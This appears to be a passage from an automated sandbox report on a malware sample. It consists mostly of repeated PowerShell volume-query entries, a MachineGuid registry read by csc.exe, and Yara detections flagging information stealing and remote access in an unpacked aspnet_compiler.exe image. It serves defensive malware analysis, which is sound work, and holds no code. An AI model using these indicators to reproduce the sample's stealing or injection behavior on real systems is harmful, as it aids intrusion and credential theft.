Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2882521949.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879796460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2882521949.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879796460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs